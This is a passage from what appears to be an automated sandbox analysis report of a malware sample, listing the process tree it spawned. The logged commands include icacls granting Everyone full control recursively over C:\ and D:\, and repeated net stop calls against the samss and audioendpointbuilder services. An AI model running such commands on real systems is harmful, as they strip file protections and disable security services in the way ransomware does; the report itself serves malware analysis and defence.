C:\Windows\SysWOW64\icacls.exeicacls "C:\*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4680
-
-
C:\Windows\SysWOW64\icacls.exeicacls "D:\*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4696
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "audioendpointbuilder" /y3⤵PID:5068
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "samss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "samss" /y3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "audioendpointbuilder" /y3⤵PID:1796
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" stop "samss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "samss" /y3⤵PID:4564
-
-